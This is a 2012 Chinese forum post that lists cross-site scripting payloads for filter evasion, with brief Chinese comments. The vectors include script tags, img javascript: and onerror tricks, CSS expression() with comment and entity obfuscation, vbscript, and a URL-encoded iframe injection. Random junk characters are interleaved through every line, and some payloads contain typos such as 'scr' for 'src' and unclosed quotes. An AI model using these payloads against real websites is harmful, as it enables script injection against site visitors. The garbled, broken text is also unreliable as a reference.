<script>alert("跨站")</script> (最常用)
# \) n: j3 Q4 ~2 W! s<img scr=javascript:alert("跨站")></img>2 {4 O* U6 Y/ Y, ], H7 ]" S' }6 ]) }
<img scr="javascript: alert(/跨站/)></img>& q$ |' Q/ H* Q/ G3 h
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
$ c6 i9 E6 B% O<img scr="#" onerror=alert(/跨站/)></img>
# j* o, o9 C: J8 f1 V9 |<img scr="#" style="xss:expression(alert(/xss/));"></img>
6 E& @7 j6 y6 I9 P. D<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
+ g R! ?9 C0 W& }4 P- ?<img src=vbscript:msgbox ("xss")></img>
) w) A' R3 ~1 Z1 }% l<style> input {left:expression (alert('xss'))}</style>
5 y' |, D. s" f. [4 l- [# e N1 O<div style={left:expression (alert('xss'))}></div>
) H' {3 r0 z. j3 z<div style={left:exp/* */ression (alert('xss'))}></div>
7 y8 Y! G3 e6 |! Z C<div style={left:\0065\0078ression (alert('xss'))}></div>
2 T- r# ^" ~1 E8 khtml 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
5 o+ P; u) [- W. bunicode <div style="{left:expRessioN (alert('xss'))}">
6 u( h! C0 t5 i8 a: m; s" k, B. P0 r k' g! |
"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["* ~5 @# t% y4 R3 W: C
|
发表于 2012-9-15 14:09:13
收藏
支持
反对